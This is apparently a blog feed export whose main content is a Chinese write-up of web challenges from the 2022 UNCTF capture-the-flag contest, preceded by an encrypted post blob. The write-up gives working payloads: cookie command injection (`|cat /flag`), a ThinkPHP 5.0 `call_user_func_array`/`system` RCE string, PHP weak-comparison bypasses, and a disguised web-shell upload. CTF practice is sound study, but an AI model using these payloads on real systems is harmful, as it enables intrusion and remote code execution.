902b72bdc400a1fc3d5d2a20386ef57670e28f1597e0dfd20e5df2e46da25af7536b2131a6bbac69676103decd8e7443d6f3b17fdec9479c152fc89f2bba9d706a188d5c7455cc559f393c5cb63fa65e2cfedd330019d972075927110bb7ed1826766868c41c6a1a4aca0347d049478c6595e0cb68ec362b7733d5dba58cfae723785460898478f7fc6e7ebaea42daef0d0d98313148f8126fb4a99e0c037fad14086b7cd27d6f2c977e048b80f2d371722cb8804e8e4b552af4c76a0c17c9aab32f8294c93e811ca03d7e5258543508c5c21d3d4f4df267949634290d55305dc48e68f73723da3c5958c0cf332146e587c3f8a3c44962714b08a88b450fea29d7b27a58ca0d90ef1a432ac00462f00a1212e0bb65baa772d8bd6a850c04c9e835405573b83d198c4bc63f4b6cf3831556884b3c8ff38867c5343c109abbc550c32b0ea2f93e01afdc60221e6af24d51d962eb6c65067e6e686209c4bc8f6ab3edcdc5107b2a4bc99ec2903683611d6048db0fd6a53d707d0e2efffbc11642ae0a57a081cfb02074e418c51da835a864901d7a2416d8d303bfb1a7d605039c41ea82ceeaef6e02bb42df98dc9f831f98c4cdd51a572e2fc199b2ddf55cf8db890ff003db7862d41ccb1a6cbc4aa1468c51b7c3ee72dd45e8835346450cb758d76d9415c09904d781a78f6d2a64b7591223e77e1599f16c0ea5598f6010c057cc6d5670f1596796bbd17b30d9aa056b95f076d242cf8913ba6a9d0651dfa72e2153068b750eb1eade7719a81232cc1f62f5536a7d11422ac25a4593eeede2655ce8be0d4c77fe5106c142b3febf1a82571e07337293b8fa58a25a3785fcfc73f78709ad2933c47e12026d97e8455e7537c09a95cd4c5e682074e71b6c873b3c14e18b64828b9f83fcc7571b7b4edfaa2a8e5fe165b73464847a6513b0c88cc73f28b8df5fadd1b38a16ce311a941c0c8a17c9c18b948dd309df7f7c1ba4715d1a4abe6a4bf62c327eee3b1c93385c84344a139b02646ee1479e2dd5a3b94266b701bca647e986c762435186911fe05eda6cb9e648365b66cdfdde4a60898486b560b274da090569b55a24d876459643c98ac60f52042c2ae99d6841c0478fe2c505df7f240a6d4ba2aa845064ca3423b5d526736ea6dad8460867e4e6399a75653a4bec69940eee430091c3ec80bb28615965e5adc5c200ff537547df53ceec51475e7893591bf006e3f0016f4478d41ce98d667e1d707d3382dbaf84f494b5878eba174a2d63e6433954a845186c9b59389056fb3dda4f7d9224a1bdfb3fd8c929424d9b79178799adac6fa4b0bc622055f9f92fcbbd25b0afb11c7b9c22383b20d452993ff9d9db568b8521774c8b3f16bf769bf37571a7e7077be445fe1f1a1d8c32a3f1bf435ecf8afd0274da609190228431bc47048fab0228b570dce8a74fa385a37da88432c0c044532a66157845687945c7f8ce95e803c826dee00cdc1b46d9033d19c05624e781d7b0429852bc737691aa1505346a7163de97702c534be44757430ad2e6764769797cb11cd710ca8542e0f7466d745bb7d8c89b66371335fd33b7f122aab0407aaca40764a38e5fc03661eb469665196bd16fbb1ad3593f18f7de2ce480a9a5f91a74ea4a3c23d7a01ca863c06082b012dc07da3b573c3dfca500cdc67887bf35a00f44ab0976369bbee7856a0ec698d0f4400dba0480a69adb35e3b916dc1c56c28b513d958acf7d136ac1a78f8f48d48d01515641ed27c1fd754e798af90ab1fc23c61468d765bf939a0476c09a1168192ba349ed961b4a3a9336ed345aec181e899d7d36d3ba1c1b8ef4c5d12fe14c90fffba1a3532ec7fdf4dd325d22624749726111ce53ad57a828ed4ea8c87fcd360a9df3cfd70d3234ac469d9237a654d81aede546a4bbd3e1d102145283f8d6a1ea5f4d019b8fae2ede1ebde52b2fbb71a0eaed52619082b1f765a9b460f084817f813d45f6e94d62d1ab35ca0758c4495fec05e8f62f79e3f0095344959af655ccf1842b0cba48d1079486dd233b07f1aab7c4fb80c148cbce38d97bcdfb1591cf0e3f2dc0dbed5243c7a3afdad630469285ab02de77ed495036e0fcaa94384af8560533bfab93c917f94a9b8939c50ce409a65c85f4efbbcc581e9d780ae103cc047327c26c65efabe200253b0c94e57adfbced367432b6014b78901982b6de4050697cc1dcfe741fcaa1a12c971147252028848933e8f0db552e3e647fa2f14876d4cd96cb32eb469f04a446d56765e16786b7aa0d1f9682342e9a5df873d7763837decfbba141fc8225e7deb1733c5a924c096412bc95f02189e67f8cc439229cefae37c1f2b67ed14e0752b5dce8cc181ca422fc5e08ffa68d6201da97acbf6a0d5481184c8190f41958b24f53937afd5d3639b14f5550423469dc3e4118b34c1ddc01f40b49d527ee8824ad9d64cb9daf7ef21bfed63acda3a74d394efdff024764ddc58e8294a414b7917085ba68741b182ec1529a3d6c065d225df75ac9616711f8d9a0c85269cfe480a89758dfd4bb283506b058ce203da7f78c62266b146857914f41df7a281bff2ec984e13b58dbc937178f2a1bed82ee6db83b203410cf1b5a0906928aca50262f12181817cdf576a164a682a54f51410fec432abf99c530e6cb37a2ed28ed41ebc69e78a2e0b47cfc909c7a11c023fec28c0c5db6027da3ba7bea167e348e8f706660490997c8886ce97ffdb76a78f0f1de926e9e1902ed67ca25c6da1638435642aff94657388885c14ead87922d47536325c9b4b6424485a95257289cb01ce2717f909861c6cf2315fb1d55446c67ad95398ed3d7273325858bf15d4d7d5637ec5c39c091ec427f46899e3ebf9ee521a8e517acf6f31f684485e924dca3a954ad3a24ac8f8276fa98e7546ba7ee536c28f2065912cf1541e9570939734281bd17c22382751d7a8a7dbbfbfcbd6b8acc2b6af40cebb98f948c253027865759731527d14f00347511383850c592096ce86b0e748096b58a0ad34927cb1749263d53a75f0741d59b420694519246de2bd7c25480d0a7844afcc769fb74f1038226bc3d37e95d57f2bde71983c19dc90b6d2962979ddf0f76be0b0a66585355d081a54c1df997754fff162bea6fa061f61b6a2448824a8ca5727eba735bd071e1d891fea748dffdc2ba481d473f8f6413dda4df615f619b04241952f110215fbb0aed17d3dba072335f9e890f9e536f398809ccfbd07d8463b6463e029b22f5878371966d0c7a1e673f8e7c2e6f7fc65c4157c2b40cc949b1592fc634c7eaee8a55de5e41b9dc505c441ea640339abaf8278f6ac9db5ce995f79467339b451ec4890e7ccb6601acfab33bbcf7c71f22160838e5d5aa19eca2a82214021bf9b37110d3b536466104149d04867f2983e5d9419b0317a43f331d52650f0942f4466d5e800cbd3bde8df6860db341433f94db21c7edd3f58b8d776174460056346488ab7f98abb29f6901322c098ae74b5e795001961c5914db8493a2c7ddc4ef39da7aeae74b19b3a73eb1fa19ab51225f072982009e215619bb9747d720851626b0ac49a2bfb214f1e8ea50bd5442b3327ffb3656f61f5d587bf0888e586274f94442ff5d303ce25607d0d9db10e1f0796d06f87a1ac58b874a88ae481943613005aa5529684a7518964f3881114cc8a3ae4cf3aa3d2cc089d3be74b583299abf71bf96e90dcd93211f4e0bda9a0be3bc6964ff1bb7e02d5d3ecf1ecb391e3b0080c216935e32f44e0d5a7779387ec158103e7d4f84daba9a4e6b218739276eeb4d24400f921d2ea4d3b2917dbc54538e69d4cc4c4f1d90bea461cef940f1ffd437a3ee5f0b667ad0cf3821f44ab4570e69bf0a472c2065690edaf99fdd1fe014a3146bbcba0729f31ceba238ef2696510d2fadea76f9ababd31dfee1f57d9cb18f68de808d4cb38897309ea9fb2f10868da98d9ac16ae32ce910f42766ca467b8f28193f5ca36953d1277bf6af4599a19025571dc85e80265d86620c36128ae479285476b3bee90a3d54a8ee3d814f1a34af99fd6c1dc664c292d65d49bb9b2fb765a371c836c8e1967df66019e133a9139d2e2afb4d7efc2051066d331bba4ff17d3aea44c7b02109f536686a803a2154e8955fc870589ce98e74966223bac7b1ed324b1292d55e87b3a7cb85408d2b5c0bd71afb5d66a72d342ec232a93dccfa849dbd3cb48b922b2a75a0413300e421ede27d10ac09f6d6b702dffe9307d2ae127dce33e8644b55706f94a7666fccd437af93154e9b301c5c372b009ab9684f5344cf94f377c9b8ccf0e1cd4459607df9847aa66aae894cd8d7903c9ce19bf1896d0fc9796fae7153e0e1751076100d348b126cc2d4391d7c0e204c95d9fdee22458eacc08f1c38e23a1ab61d4cdda3b988ade8415e6735161c170aa8098cd1ba347c292818cdcc0f5a48626985a587d3fc44f498ddf4b590f21d2d4581951394daa3d44982cba359c4a4d085feb3b498bbc4d3de3fafbf16fb1ff4a46433227b7d0824ec781b5284e3e89143224ecca39f6de4d137973254bea657151272ad595c84c14f509c32f1cd695cad1752dbb34483377cdbf2d81381db1e5825c2c8fe644d3d05872a6db5debe287d6d246557692bb1b5becabfa7d0a1cb3c90f983fc8ee6f919d87ca85d4d798f620a248d67124c979322e7a74459bbf7dd33de0e696da1c1fb3f959c6ae62d317db9aa2cdcb02b9722ef6c669b161fef5f646ec8437cdf931fa6d4087c0377e1070276379a8af021d90b8022f6b2f40e9f237952c7dce11afe76c897adc8442ddf1d8532f659ee74fdfc6c40e21ed3760d2e5fd9ad29e40a7fe8b9c2569ab63e9c2cf260625c7d31fc54feea96278ba28de119c08076c1b140c8dea8ac16c5baffc547207e50cd581f6811f761b38881b605ac8ee2a0e2aa5524263a1b3885644670f135b768822988e6f169e566edeff5dfe1e4eca683e7bb3d74d8b21a87614f8900ab47a4ca5d8baa01a0ac2617461c7def7d0cbaa5ca68983925b343631d2e870775fef9dbe681977e6b9007177fe3f386f07ed09d3c399c502b2dd20b7f93a52246e8f1ccb188b361faae7cc5f217f2ce8b609c2cc0f49ea349a61c755e7fabdc247a13853b94ff62c7bb46f745bea938955306cd0ad2adbf8fc9baead98ea0096af2a7e205fb0c210fcadb668cdd785751246c187c1b62c5e2bd734aea88f53d0bc09a1f6a7cc672bd0fbff79843f843691062490a1413968a8ee4e1aaaf3d6d3a33c4360d11576e475082849dc4a0a3f9cfd6c811e6ede1e1a793c254f475aa57b29f418e6f64b4e556019030ff2a28cfb3ef86e55dd10c188ddd62aed9640f65b30241dfc40ed2f27543277ac72fd4c16e480071f759f7b4b83a415e7eafcd2940c3b93d07ac9e23cbeb88ccf4cc71e51e659fa19564a90e8b95be3f4bd5b51d83f7ed0f5d88f129fcb11b8d6ade993b2f09c2bfc83e51d8e109c0d9a51a83a315fab408c67a6bf6b79772dc607834e4012027976ffc49cf4e5faf8fb082524a58eab42abd7fe405dad209e97624000ac13a4a1156e57e3b5248d583e7260bf7ec639a3caf4c072cb834ceb59aa426cb1068de30f5fd883e1ef11d1e86e7d88c6a433f4094be40755e388defc30b4c1e86b01a48694724b400a58fc0ce4287183ed4c03a55c69da100951aaaca2fa90ea12e7e8ee5f4b8c9fedb7b390056c2f8d07ea3e3bf7eacad3aae316367f409aee7e3896a1dbcf8dd1abf729fb81a5c7e553b13e036c160914bad4f13a1b8745e6a29377758439c39261b11bf1b7f231293d176152d08babf491475748709033fec277df16100f64e9a9d72753d99514dd63a00bdd088945f24442be4a80a146562cbcd8857c729292bd9e43a476969f86a151460b86ade99c08513c08f324737bd361ad5014f1b9a35ab836cfbf3796380836686997cf7f2b652335c4ca1af2ceb4aed14e9246b5cea129e5ff03d79dbb0c33ac4406fa6ff96108c3353ec53abed57e4012f8a35d2c666199800316c245f243138a16e763d2246fcb72eabe90dc2465bdbead54e96fda8e205b3d09b8cf3ae9702649500d8293ad55449eeff0413c124d1957475fa4ebee32b851053d08d7ed410d8cb4824df337e12918d36c93430c315217e02caca2f9ecddf4f92c4c1aad699fda0b2d4d6e55734a32d54953694e5c91f1e7d1cb6fc2ed37e273287bcc847742af641d380784f6f03221da261f3a4f8cbc551bc944d8bef9dc384391f1e10becc470f9d10722a384b238ef3cdb354afc844ed5644d396931e5e352931e35590aaa6a9cc796731a9f86e12a17e2f751c500ad0f2ca3cf2766692efd1d8665b6655f314ff13d7a334f520ca55c84be11e5511b72646ded5805ff27d1019d045373023f52b64384e8c1ec8fa83541d47575665d2c6818f15b7a5126125f48ba966a8166eb289f85ba116e09765d0f51fedbbe80d3e95f434fc208c195ec4d338a4c5256b4b771b00627ff0ac562ae501a1f9ac52cecabb0cf767125a481e95aadc3b68405b1d60e922c27b32d253cf9a103a18e02335da36662b1bcf221c6cd3686eab4c8d442f5c5daf86ba231073bb8bc07643c5e6585e6924f6cd753235da99f8fe121ab6f752c9edc2e921be83f1dce75ceee683cd1580d71fdee49ee5f543425016b0e4992a8b341f9e5be50dac4c765d882bd6bae829db7b48fe73b8e1c5c1513f9817f4d41239df8b5ed7f5a8a30f01c1b5746791f6e851a9af980add42b7383e3db3a9c0b293bf70d48a4ff06161b833b19c3ebd38b5767c3ce612a210ea1995ddf72a05b240bb44a006e1d72fe47cba2eaa072c00c51c3d5867834e8ed64f056118e75c7a60dcd42587597c11f23ae5f21ebc5657a38232bfd85dfeba1c59447b55cf41e7be137deb386bb1ae093d9fae6838660bf76c6d0e360cf544000611f81457bcdc958d77ad708939c7e0e3cbf8a07baef238f4fa59d41e2f1bfc55ee4cd3d32a835457a348b71bee1095945cbc095ca2c968fc91da19b455aefaff6c3490dcb445be6f872efae940d51344d62d6fe8436d3737bb847f89e01f6d8c36b4f5ab6a088d31bb7fbd36d528aec220ef69aa2bee2edc14b14a55dbfb0ac187b93d1c0b9fee8184c9bf32d62479371c566974512fed7868956ded1da9e02ad4f1700b2eed9e11e4022920ffdbb8f18e3020ad80161f7e98b022f498a77c72549983726fd7bd34c48fb09887475fa9933287b6569a6efd8c61dafeea03a3597f2e616766f0d177d76ccdbe01e6356179c8d6460610800e6162e17b2eda421cbe53dd7925fc6ece193428bfa65a313df402e5df4abeacbf3cecbdd5b3ccf877ddf66ace98b7d77da6ba334c62e6a85cacc61aca5d3c4f2fea456304c39aa9698cf6fb38667fb11935bbeb90b977454449b853084b905dd8d34fc4208151569b954511083630e99fa3969808d83093fc422d5a70380a750ce0cfef765e599e994ad9fd590a39616c460243a04fa69ec70e9ddce2380b6f6286c13b0a5cffec25fd23f0ac46024142883a6f21d2900b0761e7f8facaa4c091d01fd9bac7a35bba35a9969ce621bf86909167c6f5638b5520fc30312cfc6d11b195b6cbecc4ca69a550010d1cb9af5e5e50d5c115ae39bd9bb3cf9268ab9bcc76eb1e75633c9e5cbe9461fbbae3357cad0ced3c63f11d9367f13bd596071d7fb1b7e719ca63c6f83b1bffea88bb3a9d7497cf57aab1ccacf79afc046589261f2a32e3ee4696a298cb6df0fa8c8798aa8862b2772999ffaa60d242c68d7b861a15ad798c06579ff89023f8254fcf575ec0312db437b62980a0a3c511658cfe2a57c48d30545f8b1acd34fab68bccfa3afb12d637d5d7ee2676955f162a61c349386231ac4e6abc409d11050914088c3f0363f9dda271eaee9f6fa7e725711f332059dbe7b722d5f1c5172869ee37a647add28e86fa0d99a03b59eda37b8bc0d2604dd9d42d068cef1eb64485f7f10ba6b70ce43f3afc1f49e6b75700ec1165dc0853e71f1dee239babf6841b9bb0373f02c53e29c02d10eeccceadc8f020d6eab3ff193e2fc15a0ae5924ba5490ca720f6673d15243d3e4e2b288d096c72387e24fbd59ae704f032ed686111f092c1ec7997b2e03897f1730d376a54572da9385f0b32e55ef073691c68e5553e7110b44bafee2869d59e7a75ed1f38e8dfdf96f9d94b898f5ca2159233cfe4a6899363dcd1e40456ed750ec037669d5c5b95c75876c8967655e1786f87d7697e778fee02e17144321041fe1ac96bc821e070a728789ca1df9f2139be9bc01555bc5ca80123c8797c934acc1a94ea734e467a99167bc900bc155e2fc3c5fa2ddf3900756f2154745a71fa8957a3759e55b7941902775cc446dd05658b027a168126d82adaf2bd625932dd721956e594ae34f544d7a0206b21d9ab93c1eef69e5e045be0217e9326587ced907b537e1313c0682eef90b0eeb09a6337c70920e77c55b8e89a6844b8b8744eb2810b4438cb260441ca97bad345662678eb91504578aed7c97807e823c064f66f2ae41abdff18a141e705d72d5fd689204142784f221367fa19f0c0796f7c95840f9be1e2a9a36586eb5aa549c70bcb9e41f5a9f083e202000b31b00ca82f9a72adce27bfb41fa2b7e0ab869cb714419c91e2f838f267411b3a07d219789dbd8556206e342fc3e02b49d52ff51c88192dada2bf35dcb63715f6f3340467b157afe9880eaf26ce96560dbc450a134f16095dec9db938e54c31ebc95a3eace086684b0c1ad248fcc361d063c73940ff1c6a3c8cf46ca944b93e358ac4880502f5fc4e0b062b27e246ea787811b67b946f3a79515116e54c75e281b35dcd3a3dd091d6981d5c188eee2df43fea799bb2595cd022b6db72d9d18aaf97ccac3889d201bbda93480c608a44aea1bf53b3dc46093e222318445080ce56c92bd22bcdf9d290b0754f30d40362df9a7ad5ad82f6a786c1e9d188b94dc111d7d31beac37fddad15994297b1ee408621f270c5d110edc2544bb4f7d2c179844c8aef4b93e685056efa966ce60a329ca40c2f2babd4d2fbc13d41d4ad5fbfa5c98b139495947013d57ed236db68b1de622b365fd111c338b6f954f6fd5e7d79c59b03a330e49ed71fdc043d22ea44d957ef55e035de0677dcd8ed39135112beefeb9e28ef9c8a948f891327b585c95fcd4e79163f87f45537fe8158b3b78204a49d2a284ff76afbf0e00ca3914c8ac95897d7ab5c80d1aa51d1af318b0c06f7d19b042233dd6629970daa90e810c4ba7eff65158fc2093bd2604d4e74c12c4ba04fe3baf579a59f707253a92375b6024d80d85dea6c1681a8b286ce1b89745c2a51fba378f2ae60fc4cb33a76b76af7f8f191a8605887e9c52fe6a76938cc809038b9f23a1bc8c810e30f077cef977f84645e2435d0729501c64545c99628a635e87751d0866bd823e28df6f1077bbf7e9a5af1c5259028d5b1f1b84a16967d4c69e4c5d5dfe2148d5e6089a62b5d729d0647d662dbd007aa466f8d731475cfe108aaf205cc4cebc3500f60f8aac92b3114d13a5bcb2afa2db517fbd03f0c40e5fbebaabe952a56196bf4a19b0f8fcad01abaf7550b6967a931dae0e5a4937ec2f7e7ee11582d7e8509810b4c73edf0ac1b4f699a88274ba935867b9fe69a7b35f8394ef8f32e97bed3f1dd2f4b31d701c92c4a3988c868acceeb85476df6ac006bf1ae25f15ef93b2fd632f91867a2fef387ec9802a07698812ac416fa27e84be10aeee642e01f868a30e6a583dbffe8f00c65f685d90c77dcd4e26acce8c85221e10490a9a238f5813aaa6b257a5451aec005bcbbb2f3c6140be6481f7f93bee0e8083f6625643b2f2a007e630e55ca327556d9597c5a6ff29668f4c41cd222417557bfbff596150a7caca8ad4aea071ebf9c5ed85f98cfbde595ae8b461dd5b7cae8049ad410767f196062ad117336a1f74841d4ba4ab468b25e0cf9d59b9ff51ff8325c65aa9c1afe41c509a76e89d184a175f534fb3170b55955f7dd39aa6a1c16d2de4c66c48b91a1a45dd8f7f3587ccbb15557853df7eaea5d2281ebf7df67090eb41237f30f163d280115d7d6183c6511ef4dc10a1651b04eaca15fd4f30df3ab950abeccee7a4c69dba7177176483fa202c2d635e352674b8b08cd4aa4aa3baeae9fb380098132eff6a5ee31e4c388faeb42c059fff8d1aa477455dbbbab9e2143dd97e3566c8550d3c0acd47bc87bf7529378dae621bb98e9b946637bd8a7820f0fd8991507271bb82157a7ec51d04f11a1029c758d2f8aa8e5ca7bd191cdf07b440414108cc53e59c0d183751d8f798e17c075bbb4ee63732449e4ec348847c035da40c187d077ef5342f48bc5b4eb461288b6ad5f3d1ff582345ea33dd4cb70091cacc9fcb4b650155c1b4afea63b367cc65405547704a7c2229862ba79bd10e4d3c0607d56b7aacf6b771bd23e37db2c37b2e7884c171a89c80a4b77d2e27d23eda07a3c6dbc86709cb9f4fd2ebaffe6d9c8940088ec3f5bacf9641cfb0c90fcf3576035e479482148f29216853f69b5424b332a956c21f00052cbdc284a056ab86ef1d1a4e1ad765066b631b7293e48bf2edd9c784830d38b7495e128f49cb440fdbdc8f6d560beaf8e42c8a40c62b30ab2f84a42e9c7841277f204dbfad39929186d2841ea91c330a91affafc02acbaed6584f447df0d8f43bb452185c8f884d0fcc9a99b6df252e0f2d302301a3c7ed1385f5248018d4d7e81c07bd04c8d2674b03292f967c093b8e2973da95f9ea7128fd5e9c1696afe9af7738c077577d9a0ad8d958a745543e40be5e198eb2d8346f634ce1a755e28d33fb8ec25b0c987da71db6e98d74abae48ed558352afbf369a9be757dd189125974ef34a1b7e2198e1b16702fb835bed6eccc03a0520052a427733616ee31d474c3968636fb04edcaa9e08bf8db4e9e8d62e42f3898eb78dbcb295f62e3d53c12bf36a6cdc13012c49c65bc25ac571c9052cccdd44420e0016422312cc35e9d9138f8f246db40cbb49174e2faea81ed5b3b110b2d8a45c13e710c4e83b20f3b142df81e0828e584b1bfe2656bc37ef66cdf9438394e3c426dddac1993aa24a95b64fb2202b41b4f8325018fcc6969b774dfd7fa4cab01b9cd300b4843e4820012543c14c85d4d86ec3f66e140be9ef26f49b5012eab6a156b845fba0c699d393cdf9656a377edca80d32759766d0523b6cfc3d4c4ea387a2b8a5ef8c0a640c91f937910ddd045cfb573e8ff3e856fd45516d9bd43af756e5807394b234b9ab723060fda41207acc34ae2c1e19a2fbb687d56c1d94f1e6d86d180129f9ba3a40dc8767821dbad20823bbde3ccb121ad35466bf6d8d740a3c7fbc79daf57d08f2094bdef9eec46b254815a89904b3b017dbe985858355d123fbb1baa2aebf8e81e722c239905f63fef5d0b77ddb5d01e4f1cd94c60a6d6a56b0e71bc03bdb59a4b4e009d13015c74a7354be5937fd74c7f1c1eb3397f3d9ee58a91a1ab2336be1247e7adc9ff0039c8fb688e44731162ec98afbe6fa879c6474ec2ffc6f5bd87928d4b652aad863765f1e1a285ee792df79180e99cf4df2b989a038a591488bd533cc844382a909266f13fd74e662c05428451d158970dcded2fd04818588a01c05ada961da1450015a667e5c9b8ab10b6e6349302e2ad0753dea0995d3b4fca4c47cda6f0ffde3bba267037f55023419a016d83bf677ca8a5454d1933e04987fd8e5a26305a63178a2574363590a2a0fe9dd9889faeb9e063d474e1db5d01885d8018e6f3aac6fedb9172e59c3e9b2fbde7db6fd04c83cc1e69e1b2e707173d336b236f16bf6f5e279d907725d5b5a4a13750abe4ceb23ef3b5cde9e790c31437484bb0a1e8d095ec4c59c9ddf8159e1e3220db9923d6843cad7de6d38c59ff03774d780e38783f76f88a277fdf0979bf6030fc5bca07bbffd8b11311a4737359339ba5286a16ff75cab768b283e2c130c453bfde71b3db7754179497a26b6728d8e1cab5497b00d186f4078198e48f818b9e459889cd12b74712dbeff33052b5b67dc49c50fccb8736031c8f7694116ab52e9cd82f260229eb76cf9810a99aa429556f85ea3c3572b0c0990152688bde7f71f2e49a42f3c1d90f8ff1d380fbdff203d0b10821d90ed2234be3ef12fbe04d0579083eb3e1f9d5cf45076de303c7521e937c847530dffb1c6c0a9688c39fe1eb0aef7d708b940a929df3a30ee802e5d99cb529d09fe9a1ca6f3ea19c453b91a097508e249b8f0b093d908157100383a6ff87acf6da085f3229c23ad71d831289f9216f935d458ec1c50a69e472b17870e0d20e15af021874e8dfb202710f1560b7c047e56a7a681c88594b7cd5f9dd7a67aa74c2ebe86d20e3b68161e624e55597782e65252fb3aaf672b6e69281e0b78c92b6055cbd94545e9aed82f9410744970c4b6889fd16b1cb56ca79002f04eff3f630a23af82bb28a28433b8019f9fe6ea9002355f2bf3140827786794565a4f5cf06ec56d49d6d4ca19c6666c3ff9356db2cde1babc223d05512d0665a0e4e2755eac7ebcf217157edaaaabfab6003d3d90e303f93c07fb6615dd3971a9b9d8cb549936fbd05a11afd07fab9388b9bfb68e626fb0c8be983aba1587e3005ffd079b8a106bec37f723d7c6ccb0c51e27a6471afffaacaf4fe77998d4c3f24fd96a998e4748324788f5f6faa42002833c4e21b122a6d364b0cf8b0c83ad8eceb6e07f2db47745ddaeb1f7301c1f25348d6173e5c56dbc31fbf01f344469844382170109220a8c7ef82c3f03351e42754f7d2ba2b28a4c5dd8c9411d2d1688f645bb55488e0560b67ef6da4fae81278367c5a8e315cfe244d4c10b6036c41be5d8eb7784689eac3d25c01417658f80a6354c59650ef48c1feb1d5393c5aa5c0a5693cb425e2cb84979178e2078cc3f0d0cd8ee994a5d4d080b6996dd3aa08bac612ead59db88b00b76272be39d7d40bef4ddfac52a606c9a0c6fcb915d2549d7a384c1c04c7844991b482f7a20a8ba479e4b83859ad273c15638e54979018f1ba1fc83115b2eb9a5513920d087</script>
  <div class="hbe hbe-content">
    <div class="hbe hbe-input hbe-input-default">
      <input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
      <label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
        <span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
      </label>
    </div>
  </div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
      <categories>
        <category>资源</category>
      </categories>
  </entry>
  <entry>
    <title>2022 unctf wp</title>
    <url>/2023/07/2022unctf%20wp/</url>
    <content><![CDATA[<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="我太喜欢-bilibili-大学啦–中北大学"><a href="#我太喜欢-bilibili-大学啦–中北大学" class="headerlink" title="我太喜欢 bilibili 大学啦–中北大学"></a>我太喜欢 bilibili 大学啦–中北大学</h3><p>打开就一个 phpinfo<br>直接搜 flag 直出</p>
<blockquote>
<p>虽然我是中北大学的，但这不是我们实验室出的题<br>略感离谱</p>
</blockquote>
<h3 id="签到-吉林警察学院"><a href="#签到-吉林警察学院" class="headerlink" title="签到-吉林警察学院"></a>签到-吉林警察学院</h3><p>打开有行注释<br>以为拿来当用户名密码登录就完了来<br>结果只有个登录成功<br>假签到题<br>尝试使用其他用户名（规律：用户名&#x3D;密码）<br>发现学号改一下会出现字符<br>再试试还有<br>开始爆破<br>burp 先设置最后一位为变量从 1 爆到 9<br>然后再设置两位为变量从 10 开始往后爆<br>最后手打的 flag<br>懒得写脚本了（为了个签到题写脚本不太划算）</p>
<h3 id="easy-upload-云南警官学院"><a href="#easy-upload-云南警官学院" class="headerlink" title="easy_upload-云南警官学院"></a>easy_upload-云南警官学院</h3><p>传个一句话 mua 写的图片 🐎<br>进去发现不行<br>试了半天<br>把 ContentType 改成 png<br>传进去了<br>然后 🐜🗡 连一下<br>找 flag<br>在&#x2F;home&#x2F;ctf&#x2F;flag</p>
<h3 id="302-与深大-深圳大学"><a href="#302-与深大-深圳大学" class="headerlink" title="302 与深大-深圳大学"></a>302 与深大-深圳大学</h3><p>进去提示 302 重定向<br>burp 抓包<br>然后让 get 和 post 传参进去<br>最后改<code>cookie: admin=true</code><br>flag get√</p>
<h3 id="我太喜欢-bilibili-大学啦修复版-中北大学"><a href="#我太喜欢-bilibili-大学啦修复版-中北大学" class="headerlink" title="我太喜欢 bilibili 大学啦修复版-中北大学"></a>我太喜欢 bilibili 大学啦修复版-中北大学</h3><p>打开又是 phpinfo<br>看题目描述找 hint<br>于是搜索 hint<br>发现指向 admin_unctf.php<br>看源码发现注释</p>
<p><img src= "/img/f022e3b2ba594d11a8788b28d647e89b-1689254291068-205.png" alt="在这里插入图片描述"><br>再抓包，发现 hint2<br>get 用户名密码 unctf2022<br>审源码<br>注入点为 cookie 的 rce<br><code>cmd=127.0.0.1|cat /flag</code><br><img src= "/img/c56f238952a449e09ee455c2a5c36ee2-1689254293564-208.png" alt="在这里插入图片描述"><br>得到个网址<br>指向 B 站用户界面，flag 出现在个签里</p>
<h3 id="babyphp-中国人民公安大学"><a href="#babyphp-中国人民公安大学" class="headerlink" title="babyphp-中国人民公安大学"></a>babyphp-中国人民公安大学</h3><p><img src= "/img/889ebd74b3a446889c7c782732b3d014-1689254295621-211.png" alt="在这里插入图片描述"><br>先是弱类型 0e1 直接过<br>的二个弱类型比较 sha1 值<br>拿出收集的 sha1 值为 0exxxx 的字符组个 payload post 上去：<br><code>a=0e1&amp;key1=aaroZmOk&amp;key2=aaK1STfY</code><br>当然用数组绕过也可以<br><code>a=0e1&amp;key1[1]=1&amp;key2[1]=2</code><br>发现回显有手就行<br>说明到最后一步了找了半天姿势<br>print env 出了<br><code>?code=print_r(exec(&quot;env&quot;));</code></p>
<h3 id="ezgame-浙江师范大学"><a href="#ezgame-浙江师范大学" class="headerlink" title="ezgame-浙江师范大学"></a>ezgame-浙江师范大学</h3><p>进入游戏发现 999 滴血比 10 滴血<br>于是直接定位血量，搜索 10 和 999<br>发现 10 有一对 110 干扰，不好定位<br>于是从 999 下手<br>把 mainjs 放到本地<br>把代码缩起来方便看<br>发现 999（5149 行）在 120 里面定义<br>往前找 new 的 r 发现定位到 146（5104）</p>
<p><img src= "/img/c74f444604ae4fe8a7acdb0fda5814b0-1689254298285-214.png" alt="在这里插入图片描述"><br>去看 146<br>发现个 life 和 maxlife<br>选择 maxlife 下手<br>先下个断点<br><img src= "/img/14c1f5e2231a4a94842e6dfacb554121-1689254300169-217.png" alt="在这里插入图片描述"><br>运行后调用来生成各个属性，一开始给的是 10 即自己的血量<br>再继续运行直到 t&#x3D;999<br>再修改右侧作用域里的 t 为 0<br>继续运行 flag 弹出<br><img src= "/img/a9fd35417ddc4086b8780cc0e0c359a2-1689254301778-220.png" alt="在这里插入图片描述"></p>
<h3 id="给你一刀-西南科技大学"><a href="#给你一刀-西南科技大学" class="headerlink" title="给你一刀-西南科技大学"></a>给你一刀-西南科技大学</h3><p>放个 tp5.0 的页面在主页<br>指向性太明显了<br>直接搜 tp5.0 漏洞<br>当然以 rce 为主<br>只看了前几个网址<br>共有两种 payload<br>试了之后有一种成功<br><code>?s=index|think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][0]=env</code></p>
<h3 id="听说-php-有一个-xxe-西南科技大学"><a href="#听说-php-有一个-xxe-西南科技大学" class="headerlink" title="听说 php 有一个 xxe-西南科技大学"></a>听说 php 有一个 xxe-西南科技大学</h3><p>拿出 xxe 最简单的 payload(做 buuctf 某 xxe 题时 payload 留的）<br>用 raw 格式发包</p>
